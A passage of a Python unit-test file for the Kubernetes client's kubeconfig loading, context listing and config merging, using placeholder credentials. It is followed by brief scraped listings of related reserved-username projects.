"wb") as fd: fd.write(TEST_CLIENT_CERT.encode()) with open(os.path.join(temp_dir, "client_key"), "wb") as fd: fd.write(TEST_CLIENT_KEY.encode()) with open(os.path.join(temp_dir, "token_file"), "wb") as fd: fd.write(TEST_DATA_BASE64.encode()) KubeConfigLoader( config_dict=self.TEST_KUBE_CONFIG, active_context="ssl-local-file", config_base_path=temp_dir).load_and_set(actual) self.assertEqual(expected, actual) finally: shutil.rmtree(temp_dir) def test_load_kube_config(self): expected = FakeConfig( host=TEST_HOST, token=BEARER_TOKEN_FORMAT % TEST_DATA_BASE64) config_file = self._create_temp_file(yaml.safe_dump(self.TEST_KUBE_CONFIG)) actual = FakeConfig() load_kube_config( config_file=config_file, context="simple_token", client_configuration=actual) self.assertEqual(expected, actual) def test_list_kube_config_contexts(self): config_file = self._create_temp_file(yaml.safe_dump(self.TEST_KUBE_CONFIG)) contexts, active_context = list_kube_config_contexts( config_file=config_file) self.assertDictEqual(self.TEST_KUBE_CONFIG["contexts"][0], active_context) if PY3: self.assertCountEqual(self.TEST_KUBE_CONFIG["contexts"], contexts) else: self.assertItemsEqual(self.TEST_KUBE_CONFIG["contexts"], contexts) def test_new_client_from_config(self): config_file = self._create_temp_file(yaml.safe_dump(self.TEST_KUBE_CONFIG)) client = new_client_from_config( config_file=config_file, context="simple_token") self.assertEqual(TEST_HOST, client.configuration.host) self.assertEqual(BEARER_TOKEN_FORMAT % TEST_DATA_BASE64, client.configuration.api_key["authorization"]) def test_no_users_section(self): expected = FakeConfig(host=TEST_HOST) actual = FakeConfig() test_kube_config = self.TEST_KUBE_CONFIG.copy() del test_kube_config["users"] KubeConfigLoader( config_dict=test_kube_config, active_context="gcp").load_and_set(actual) self.assertEqual(expected, actual) def test_non_existing_user(self): expected = FakeConfig(host=TEST_HOST) actual = FakeConfig() KubeConfigLoader( config_dict=self.TEST_KUBE_CONFIG, active_context="non_existing_user").load_and_set(actual) self.assertEqual(expected, actual) @mock.patch("kubernetes.config.kube_config.ExecProvider.run") def test_user_exec_auth(self, mock): token = "dummy" mock.return_value = {"token": token} expected = FakeConfig( host=TEST_HOST, api_key={"authorization": BEARER_TOKEN_FORMAT % token}) actual = FakeConfig() KubeConfigLoader( config_dict=self.TEST_KUBE_CONFIG, active_context="exec_cred_user").load_and_set(actual) self.assertEqual(expected, actual) class TestKubernetesClientConfiguration(BaseTestCase): # Verifies properties of kubernetes.client.Configuration. # These tests guard against changes to the upstream configuration class, # since GCP authorization overrides get_api_key_with_prefix to refresh its # token regularly. def test_get_api_key_with_prefix_exists(self): self.assertTrue(hasattr(Configuration, "get_api_key_with_prefix")) def test_get_api_key_with_prefix_returns_token(self): expected_token = "expected_token" config = Configuration() config.api_key["authorization"] = expected_token self.assertEqual(expected_token, config.get_api_key_with_prefix("authorization")) def test_auth_settings_calls_get_api_key_with_prefix(self): expected_token = "expected_token" def fake_get_api_key_with_prefix(identifier): self.assertEqual("authorization", identifier) return expected_token config = Configuration() config.get_api_key_with_prefix = fake_get_api_key_with_prefix self.assertEqual(expected_token, config.auth_settings()["BearerToken"]["value"]) class TestKubeConfigMerger(BaseTestCase): TEST_KUBE_CONFIG_PART1 = { "current-context": "no_user", "contexts": [{ "name": "no_user", "context": { "cluster": "default" } },], "clusters": [{ "name": "default", "cluster": { "server": TEST_HOST } },], "users": [] } TEST_KUBE_CONFIG_PART2 = { "current-context": "", "contexts": [ { "name": "ssl", "context": { "cluster": "ssl", "user": "ssl" } }, { "name": "simple_token", "context": { "cluster": "default", "user": "simple_token" } }, ], "clusters": [{ "name": "ssl", "cluster": { "server": TEST_SSL_HOST, "certificate-authority-data": TEST_CERTIFICATE_AUTH_BASE64, } },], "users": [{ "name": "ssl", "user": { "token": TEST_DATA_BASE64, "client-certificate-data": TEST_CLIENT_CERT_BASE64, "client-key-data": TEST_CLIENT_KEY_BASE64, } },] } TEST_KUBE_CONFIG_PART3 = { "current-context": "no_user", "contexts": [ { "name": "expired_oidc", "context": { "cluster": "default", "user": "expired_oidc" } }, { "name": "ssl", "context": { "cluster": "skipped-part2-defined-this-context", "user": "skipped" } }, ], "clusters": [], "users": [ { "name": "expired_oidc", "user": { "auth-provider": { "name": "oidc", "config": { "client-id": "tectonic-kubectl", "client-secret": "FAKE_SECRET", "id-token": TEST_OIDC_EXPIRED_LOGIN, "idp-certificate-authority-data": TEST_OIDC_CA, "idp-issuer-url": "https://example.org/identity", "refresh-token": "lucWJjEhlxZW01cXI3YmVlcYnpxNGhzk" } } } }, { "name": "simple_token", "user": { "token": TEST_DATA_BASE64, "username": TEST_USERNAME, # should be ignored "password": TEST_PASSWORD, # should be ignored } }, ] } def _create_multi_config(self): files = [] for part in (self.TEST_KUBE_CONFIG_PART1, self.TEST_KUBE_CONFIG_PART2, self.TEST_KUBE_CONFIG_PART3): files.append(self._create_temp_file(yaml.safe_dump(part))) return ENV_KUBECONFIG_PATH_SEPARATOR.join(files) def test_list_kube_config_contexts(self): kubeconfigs = self._create_multi_config() expected_contexts = [{ "context": { "cluster": "default" }, "name": "no_user" }, { "context": { "cluster": "ssl", "user": "ssl" }, "name": "ssl" }, { "context": { "cluster": "default", "user": "simple_token" }, "name": "simple_token" }, { "context": { "cluster": "default", "user": "expired_oidc" }, "name": "expired_oidc" }] contexts, active_context = list_kube_config_contexts( config_file=kubeconfigs) self.assertEqual(contexts, expected_contexts) self.assertEqual(active_context, expected_contexts[0]) def test_new_client_from_config(self): kubeconfigs = self._create_multi_config() client = new_client_from_config( config_file=kubeconfigs, context="simple_token") self.assertEqual(TEST_HOST, client.configuration.host) self.assertEqual(BEARER_TOKEN_FORMAT % TEST_DATA_BASE64, client.configuration.api_key["authorization"]) def test_save_changes(self): kubeconfigs = self._create_multi_config() # load configuration, update token, save config kconf = KubeConfigMerger(kubeconfigs) user = kconf.config["users"].get_with_name("expired_oidc")["user"] provider = user["auth-provider"]["config"] provider.value["id-token"] = "token-changed" kconf.save_changes() # re-read configuration kconf = KubeConfigMerger(kubeconfigs) user = kconf.config["users"].get_with_name("expired_oidc")["user"] provider = user["auth-provider"]["config"] # new token self.assertEqual(provider.value["id-token"], "token-changed") if __name__ == "__main__": unittest.main()

예전 사이트에서 쓰던 reserved usernames 모음. 물론 짜집기 및 추가된 항목들 ㅎㅎ

Reserved usernames to not be registered by users. Works on <username>.domain.com and domain.com/<username>.

A list of usernames that should be reserved.

No description available

No description available

Symfony validator for reserved usernames

gkp